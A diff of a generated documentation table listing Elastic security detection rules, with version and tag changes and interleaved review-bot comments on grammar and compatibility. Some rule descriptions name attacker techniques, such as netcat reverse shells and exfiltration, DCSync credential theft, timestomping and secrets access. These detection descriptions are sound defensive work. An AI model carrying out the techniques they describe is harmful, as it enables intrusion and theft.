"vmxf", "vmsd", "vmsn", "vswp", "vmss", "nvram", or "vmem". These file extensions are associated with VM-related file formats, and their presence in grep command arguments may indicate that a threat actor is attempting to search for, analyze, or manipulate VM files on the system. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend] |8.5.0 |3 +|<<esxi-discovery-via-grep, ESXI Discovery via Grep>> |Identifies instances where a process named 'grep', 'egrep', or 'pgrep' is started on a Linux system with arguments related to virtual machine (VM) files, such as "vmdk", "vmx", "vmxf", "vmsd", "vmsn", "vswp", "vmss", "nvram", or "vmem". These file extensions are associated with VM-related file formats, and their presence in grep command arguments may indicate that a threat actor is attempting to search for, analyze, or manipulate VM files on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend] |8.5.0 |4 -|<<esxi-timestomping-using-touch-command, ESXI Timestomping using Touch Command>> |Identifies instances where the 'touch' command is executed on a Linux system with the "-r" flag, which is used to modify the timestamp of a file based on another file's timestamp. The rule targets specific VM-related paths, such as "/etc/vmware/", "/usr/lib/vmware/", or "/vmfs/*". These paths are associated with VMware virtualization software, and their presence in the touch command arguments may indicate that a threat actor is attempting to tamper with timestamps of VM-related files and configurations on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.5.0 |3 +|<<esxi-timestomping-using-touch-command, ESXI Timestomping using Touch Command>> |Identifies instances where the 'touch' command is executed on a Linux system with the "-r" flag, which is used to modify the timestamp of a file based on another file's timestamp. The rule targets specific VM-related paths, such as "/etc/vmware/", "/usr/lib/vmware/", or "/vmfs/*". 
These paths are associated with VMware virtualization software, and their presence in the touch command arguments may indicate that a threat actor is attempting to tamper with timestamps of VM-related files and configurations on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.5.0 |4 |<<eggshell-backdoor-execution, EggShell Backdoor Execution>> |Identifies the execution of and EggShell Backdoor. EggShell is a known post exploitation tool for macOS and Linux. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |103 
@@ -462,7 +464,7 @@ and their rule type is `machine_learning`. |<<encoded-executable-stored-in-the-registry, Encoded Executable Stored in the Registry>> |Identifies registry write modifications to hide an encoded portable executable. This could be indicative of adversary defense evasion by avoiding the storing of malicious content directly on disk. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 -|<<encrypting-files-with-winrar-or-7z, Encrypting Files with WinRar or 7z>> |Identifies use of WinRar or 7z to create an encrypted files. Adversaries will often compress and encrypt data in preparation for exfiltration. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<encrypting-files-with-winrar-or-7z, Encrypting Files with WinRar or 7z>> |Identifies use of WinRar or 7z to create an encrypted files. Adversaries will often compress and encrypt data in preparation for exfiltration. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 |<<endpoint-security, Endpoint Security>> |Generates a detection alert each time an Elastic Endpoint Security alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts. |[Data Source: Elastic Defend] |8.3.0 |102 
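Review bot: the version bump on the Encrypting Files with WinRar or 7z row (107 to 108) re-emits the grammar slip "to create an encrypted files" unchanged. If the description is being regenerated anyway, correct it at the source ("to create encrypted files") so the fix propagates to the next docs update instead of living on in this table.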
@@ -474,20 +476,24 @@ and their rule type is `machine_learning`. |<<enumeration-of-administrator-accounts, Enumeration of Administrator Accounts>> |Identifies instances of lower privilege accounts enumerating Administrator accounts or groups using built-in Windows tools. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 -|<<enumeration-of-kernel-modules, Enumeration of Kernel Modules>> |Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This identifies attempts to enumerate information about a kernel module. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend] |8.6.0 |205 +|<<enumeration-of-kernel-modules, Enumeration of Kernel Modules>> |Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This identifies attempts to enumerate information about a kernel module. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend] |8.6.0 |206 -|<<enumeration-of-kernel-modules-via-proc, Enumeration of Kernel Modules via Proc>> |Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This identifies attempts to enumerate information about a kernel module using the /proc/modules filesystem. This filesystem is used by utilities such as lsmod and kmod to list the available kernel modules. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: BBR] |8.3.0 |3 +|<<enumeration-of-kernel-modules-via-proc, Enumeration of Kernel Modules via Proc>> |Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This identifies attempts to enumerate information about a kernel module using the /proc/modules filesystem. This filesystem is used by utilities such as lsmod and kmod to list the available kernel modules. |[OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: BBR] |8.6.0 |103 |<<enumeration-of-privileged-local-groups-membership, Enumeration of Privileged Local Groups Membership>> |Identifies instances of an unusual process enumerating built-in Windows privileged local groups membership like Administrators or Remote Desktop users. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide] |8.6.0 |208 |<<enumeration-of-users-or-groups-via-built-in-commands, Enumeration of Users or Groups via Built-in Commands>> |Identifies the execution of macOS built-in commands related to account or group enumeration. Adversaries may use account and group information to orient themselves before deciding how to act. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend] |8.3.0 |104 -|<<exchange-mailbox-export-via-powershell, Exchange Mailbox Export via PowerShell>> |Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, to export the contents of a primary mailbox or archive to a .pst file. Adversaries may target user email to collect sensitive information. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |5 +|<<exchange-mailbox-export-via-powershell, Exchange Mailbox Export via PowerShell>> |Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, to export the contents of a primary mailbox or archive to a .pst file. Adversaries may target user email to collect sensitive information. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |6 |<<executable-file-creation-with-multiple-extensions, Executable File Creation with Multiple Extensions>> |Masquerading can allow an adversary to evade defenses and better blend in with the environment. One way it occurs is when the name or location of a file is manipulated as a means of tricking a user into executing what they think is a benign file type but is actually executable code. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<executable-file-with-unusual-extension, Executable File with Unusual Extension>> |Identifies the creation or modification of an executable file with an unexpected file extension. Attackers may attempt to evade detection by masquerading files using the file extension values used by image, audio, or document file types. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 + |<<execution-from-unusual-directory-command-line, Execution from Unusual Directory - Command Line>> |Identifies process execution from suspicious default Windows directories. This may be abused by adversaries to hide malware in trusted paths. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 +|<<execution-from-a-removable-media-with-network-connection, Execution from a Removable Media with Network Connection>> |Identifies process execution from a removable media and by an unusual process. Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 + |<<execution-of-com-object-via-xwizard, Execution of COM object via Xwizard>> |Windows Component Object Model (COM) is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects or executable code. Xwizard can be used to run a COM object created in registry to evade defensive counter measures. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<execution-of-file-written-or-modified-by-microsoft-office, Execution of File Written or Modified by Microsoft Office>> |Identifies an executable created by a Microsoft Office application and subsequently executed. These processes are often launched via scripts inside documents or during exploitation of Microsoft Office applications. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 
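Review bot: the Enumeration of Kernel Modules via Proc row changes more than a version number and should be confirmed as intentional: the `+` row drops the `[Domain: Endpoint]` tag that the `-` row had (the neighbouring Linux rows in this hunk keep it), raises the minimum stack version from 8.3.0 to 8.6.0, and jumps the rule version from 3 to 103. A 100-step version jump alongside a tag removal usually means the rule was regenerated or re-homed; if that is the case, a one-line mention would help readers of the docs history.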
@@ -496,13 +502,17 @@ and their rule type is `machine_learning`. |<<execution-of-persistent-suspicious-program, Execution of Persistent Suspicious Program>> |Identifies execution of suspicious persistent programs (scripts, rundll32, etc.) by looking at process lineage and command line usage. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 -|<<execution-of-an-unsigned-service, Execution of an Unsigned Service>> |This rule identifies the execution of unsigned executables via service control manager (SCM). Adversaries may abuse SCM to execute malware or escalate privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Rule Type: BBR], [Data Source: Elastic Defend] |8.6.0 |102 +|<<execution-of-an-unsigned-service, Execution of an Unsigned Service>> |This rule identifies the execution of unsigned executables via service control manager (SCM). Adversaries may abuse SCM to execute malware or escalate privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.6.0 |103 |<<execution-via-electron-child-process-node-js-module, Execution via Electron Child Process Node.js Module>> |Identifies attempts to execute a child process from within the context of an Electron application using the child_process Node.js module. Adversaries may abuse this technique to inherit permissions from parent processes. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |104 -|<<execution-via-mssql-xp-cmdshell-stored-procedure, Execution via MSSQL xp_cmdshell Stored Procedure>> |Identifies execution via MSSQL xp_cmdshell stored procedure. 
Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default, thus, it's important to review the context of it's use. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<execution-via-ms-visualstudio-pre-post-build-events, Execution via MS VisualStudio Pre/Post Build Events>> |Identifies the execution of a command via Microsoft Visual Studio Pre or Post build events. Adversaries may backdoor a trusted visual studio project to execute a malicious command during the project build process. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 + +|<<execution-via-mssql-xp-cmdshell-stored-procedure, Execution via MSSQL xp_cmdshell Stored Procedure>> |Identifies execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default, thus, it's important to review the context of it's use. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<execution-via-tsclient-mountpoint, Execution via TSClient Mountpoint>> |Identifies execution from the Remote Desktop Protocol (RDP) shared mountpoint tsclient on the target host. This may indicate a lateral movement attempt. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<execution-via-microsoft-dotnet-clickonce-host, Execution via Microsoft DotNet ClickOnce Host>> |Identifies the execution of DotNet ClickOnce installer via Dfsvc.exe trampoline. 
Adversaries may take advantage of ClickOnce to proxy execution of malicious payloads via trusted Microsoft processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 + +|<<execution-via-tsclient-mountpoint, Execution via TSClient Mountpoint>> |Identifies execution from the Remote Desktop Protocol (RDP) shared mountpoint tsclient on the target host. This may indicate a lateral movement attempt. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<execution-via-windows-subsystem-for-linux, Execution via Windows Subsystem for Linux>> |Detects attempts to execute a program on the host from the Windows Subsystem for Linux. Adversaries may enable and use WSL for Linux to avoid detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |4 
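Review bot: the Execution via MSSQL xp_cmdshell Stored Procedure row is re-emitted with a version bump (106 to 107) but still carries "the context of it's use" (should be "its use") and the run-on "which is disabled by default, thus, it's important to review". As with the other regenerated rows, the wording fix belongs in the rule description so the generated table inherits it. The new Pre/Post Build Events row also has "visual studio" in lower case in its second sentence while the rule name uses "VisualStudio"; pick one form.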
@@ -510,13 +520,13 @@ and their rule type is `machine_learning`. |<<execution-with-explicit-credentials-via-scripting, Execution with Explicit Credentials via Scripting>> |Identifies execution of the security_authtrampoline process via a scripting interpreter. This occurs when programs use AuthorizationExecute-WithPrivileges from the Security.framework to run another program with root privileges. It should not be run by itself, as this is a sign of execution with explicit logon credentials. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.3.0 |104 -|<<expired-or-revoked-driver-loaded, Expired or Revoked Driver Loaded>> |Identifies an attempt to load a revoked or expired driver. Adversaries may bring outdated drivers with vulnerabilities to gain code execution in kernel mode or abuse revoked certificates to sign their drivers. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |2 +|<<expired-or-revoked-driver-loaded, Expired or Revoked Driver Loaded>> |Identifies an attempt to load a revoked or expired driver. Adversaries may bring outdated drivers with vulnerabilities to gain code execution in kernel mode or abuse revoked certificates to sign their drivers. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |3 |<<exploit-detected-elastic-endgame, Exploit - Detected - Elastic Endgame>> |Elastic Endgame detected an Exploit. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information. 
|[Data Source: Elastic Endgame], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Privilege Escalation] |8.3.0 |101 |<<exploit-prevented-elastic-endgame, Exploit - Prevented - Elastic Endgame>> |Elastic Endgame prevented an Exploit. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information. |[Data Source: Elastic Endgame], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Privilege Escalation] |8.3.0 |101 -|<<exporting-exchange-mailbox-via-powershell, Exporting Exchange Mailbox via PowerShell>> |Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, to export the contents of a primary mailbox or archive to a .pst file. Adversaries may target user email to collect sensitive information. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<exporting-exchange-mailbox-via-powershell, Exporting Exchange Mailbox via PowerShell>> |Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, to export the contents of a primary mailbox or archive to a .pst file. Adversaries may target user email to collect sensitive information. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 |<<external-alerts, External Alerts>> |Generates a detection alert for each external alert written to the configured indices. Enabling this rule allows you to immediately begin investigating external alerts in the app. |[OS: Windows], [Data Source: APM], [OS: macOS], [OS: Linux] |8.3.0 |102 
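Review bot: the Expired or Revoked Driver Loaded row drops `[Rule Type: BBR]` and adds `[Tactic: Defense Evasion]` with only a 2 to 3 version increment. Removing the BBR tag is a behavioural change for users (building block rules are suppressed from the default alerts view, a regular rule is not), so please confirm the underlying rule really lost its building-block designation rather than the tag list being regenerated incorrectly, and call that change out in the docs if it is intended.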
@@ -528,21 +538,21 @@ and their rule type is `machine_learning`. |<<file-creation-time-changed, File Creation Time Changed>> |Identifies modification of a file creation time. Adversaries may modify file time attributes to blend malicious content with existing files. Timestomping is a technique that modifies the timestamps of a file often to mimic files that are in trusted directories. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion] |8.3.0 |3 -|<<file-creation-execution-and-self-deletion-in-suspicious-directory, File Creation, Execution and Self-Deletion in Suspicious Directory>> |This rule monitors for the creation of a file, followed by its execution and self-deletion in a short timespan within a directory often used for malicious purposes by threat actors. This behavior is often used by malware to execute malicious code and delete itself to hide its tracks. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |1 +|<<file-creation-execution-and-self-deletion-in-suspicious-directory, File Creation, Execution and Self-Deletion in Suspicious Directory>> |This rule monitors for the creation of a file, followed by its execution and self-deletion in a short timespan within a directory often used for malicious purposes by threat actors. This behavior is often used by malware to execute malicious code and delete itself to hide its tracks. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |2 -|<<file-deletion-via-shred, File Deletion via Shred>> |Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |105 +|<<file-deletion-via-shred, File Deletion via Shred>> |Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |106 |<<file-made-executable-via-chmod-inside-a-container, File Made Executable via Chmod Inside A Container>> |This rule detects when chmod is used to add the execute permission to a file inside a container. Modifying file permissions to make a file executable could indicate malicious activity, as an attacker may attempt to run unauthorized or malicious code inside the container. |[Data Source: Elastic Defend for Containers], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion] |8.8.0 |2 -|<<file-permission-modification-in-writable-directory, File Permission Modification in Writable Directory>> |Identifies file permission modifications in common writable directories by a non-root user. Adversaries often drop files or payloads into a writable directory and change permissions prior to execution. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |105 +|<<file-permission-modification-in-writable-directory, File Permission Modification in Writable Directory>> |Identifies file permission modifications in common writable directories by a non-root user. Adversaries often drop files or payloads into a writable directory and change permissions prior to execution. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.6.0 |206 -|<<file-staged-in-root-folder-of-recycle-bin, File Staged in Root Folder of Recycle Bin>> |Identifies files written to the root of the Recycle Bin folder instead of subdirectories. Adversaries may place files in the root of the Recycle Bin in preparation for exfiltration or to evade defenses. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 +|<<file-staged-in-root-folder-of-recycle-bin, File Staged in Root Folder of Recycle Bin>> |Identifies files written to the root of the Recycle Bin folder instead of subdirectories. Adversaries may place files in the root of the Recycle Bin in preparation for exfiltration or to evade defenses. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |2 -|<<file-transfer-or-listener-established-via-netcat, File Transfer or Listener Established via Netcat>> |A netcat process is engaging in network activity on a Linux host. Netcat is often used as a persistence mechanism by exporting a reverse shell or by serving a shell on a listening port. Netcat is also sometimes used for data exfiltration. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 +|<<file-transfer-or-listener-established-via-netcat, File Transfer or Listener Established via Netcat>> |A netcat process is engaging in network activity on a Linux host. Netcat is often used as a persistence mechanism by exporting a reverse shell or by serving a shell on a listening port. Netcat is also sometimes used for data exfiltration. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |108 |<<file-and-directory-permissions-modification, File and Directory Permissions Modification>> |Identifies the change of permissions/ownership of files/folders through built-in Windows utilities. Threat actors may require permission modification of files/folders to change, modify or delete them. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 -|<<file-made-immutable-by-chattr, File made Immutable by Chattr>> |Detects a file being made immutable using the chattr binary. Making a file immutable means it cannot be deleted or renamed, no link can be created to this file, most of the file's metadata can not be modified, and the file can not be opened in write mode. Threat actors will commonly utilize this to prevent tampering or modification of their malicious files or any system files they have modified for purposes of persistence (e.g .ssh, /etc/passwd, etc.). |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<file-made-immutable-by-chattr, File made Immutable by Chattr>> |Detects a file being made immutable using the chattr binary. Making a file immutable means it cannot be deleted or renamed, no link can be created to this file, most of the file's metadata can not be modified, and the file can not be opened in write mode. Threat actors will commonly utilize this to prevent tampering or modification of their malicious files or any system files they have modified for purposes of persistence (e.g .ssh, /etc/passwd, etc.). 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 |<<file-or-directory-deletion-command, File or Directory Deletion Command>> |This rule identifies the execution of commands that can be used to delete files and directories. Adversaries may delete files and directories on a host system, such as logs, browser history, or malware. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |2 
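Review bot: the File Permission Modification in Writable Directory row raises its minimum stack version from 8.3.0 to 8.6.0 while jumping from version 105 to 206, and that is the only compatibility change in this hunk; it should be called out in the release notes, since 8.3 to 8.5 deployments will stop receiving updates for that rule. Every other row here is a plain version bump with unchanged text and tags, for example `|8.3.0 |105` to `|8.3.0 |106` on File Deletion via Shred.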
@@ -550,17 +560,17 @@ and their rule type is `machine_learning`. |<<finder-sync-plugin-registered-and-enabled, Finder Sync Plugin Registered and Enabled>> |Finder Sync plugins enable users to extend Finder’s functionality by modifying the user interface. Adversaries may abuse this feature by adding a rogue Finder Plugin to repeatedly execute malicious payloads for persistence. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 -|<<first-time-seen-aws-secret-value-accessed-in-secrets-manager, First Time Seen AWS Secret Value Accessed in Secrets Manager>> |An adversary equipped with compromised credentials may attempt to access the secrets in secrets manager to steal certificates, credentials, or other sensitive material. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Credential Access], [Resources: Investigation Guide] |8.6.0 |207 +|<<first-time-seen-aws-secret-value-accessed-in-secrets-manager, First Time Seen AWS Secret Value Accessed in Secrets Manager>> |An adversary equipped with compromised credentials may attempt to access the secrets in secrets manager to steal certificates, credentials, or other sensitive material. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Credential Access], [Resources: Investigation Guide] |8.9.0 |308 |<<first-time-seen-commonly-abused-remote-access-tool-execution, First Time Seen Commonly Abused Remote Access Tool Execution>> |Adversaries may install legitimate remote access tools (RAT) to compromised endpoints for further command-and-control (C2). Adversaries can rely on installed RATs for persistence, execution of native commands and more. This rule detects when a process is started whose name or code signature resembles commonly abused RATs. This is a New Terms rule type indicating the host has not seen this RAT process started before within the last 30 days. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.4.0 |4 -|<<first-time-seen-driver-loaded, First Time Seen Driver Loaded>> |Identifies the load of a driver with an original file name and signature values that were observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |5 +|<<first-time-seen-driver-loaded, First Time Seen Driver Loaded>> |Identifies the load of a driver with an original file name and signature values that were observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |6 |<<first-time-seen-google-workspace-oauth-login-from-third-party-application, First Time Seen Google Workspace OAuth Login from Third-Party Application>> |Detects the first time a third-party application logs in and authenticated with OAuth. OAuth is used to grant permissions to specific resources and services in Google Workspace. Compromised credentials or service accounts could allow an adversary to authenticate to Google Workspace as a valid user and inherit their privileges. |[Domain: Cloud], [Data Source: Google Workspace], [Tactic: Defense Evasion], [Tactic: Initial Access] |8.4.0 |2 |<<first-time-seen-removable-device, First Time Seen Removable Device>> |Identifies newly seen removable devices by device friendly name using registry modification events. 
While this activity is not inherently malicious, analysts can use those events to aid monitoring for data exfiltration over those devices. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Exfiltration], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.4.0 |2 -|<<firsttime-seen-account-performing-dcsync, FirstTime Seen Account Performing DCSync>> |This rule identifies when a User Account starts the Active Directory Replication Process for the first time. Attackers can use the DCSync technique to get credential information of individual accounts or the entire domain, thus compromising the entire domain. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Use Case: Active Directory Monitoring], [Data Source: Active Directory], [Resources: Investigation Guide] |8.4.0 |6 +|<<firsttime-seen-account-performing-dcsync, FirstTime Seen Account Performing DCSync>> |This rule identifies when a User Account starts the Active Directory Replication Process for the first time. Attackers can use the DCSync technique to get credential information of individual accounts or the entire domain, thus compromising the entire domain. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Privilege Escalation], [Use Case: Active Directory Monitoring], [Data Source: Active Directory], [Resources: Investigation Guide] |8.4.0 |7 |<<forwarded-google-workspace-security-alert, Forwarded Google Workspace Security Alert>> |Identifies the occurrence of a security alert from the Google Workspace alerts center. Google Workspace's security alert center provides an overview of actionable alerts that may be affecting an organization's domain. An alert is a warning of a potential security issue that Google has detected. |[Domain: Cloud], [Data Source: Google Workspace], [Use Case: Log Auditing], [Use Case: Threat Detection] |8.4.0 |2 
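Review bot: the First Time Seen AWS Secret Value Accessed in Secrets Manager row moves its minimum stack version from 8.6.0 to 8.9.0 (version 207 to 308), which is a compatibility change worth documenting alongside the tag additions. Separately, the FirstTime Seen Account Performing DCSync row is touched to add [Tactic: Privilege Escalation] but keeps the run-together "FirstTime" in its title; if that name is corrected upstream later, the anchor `firsttime-seen-account-performing-dcsync` will change and any links to it will need updating, so fixing it in the rule source now would avoid a second churn.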
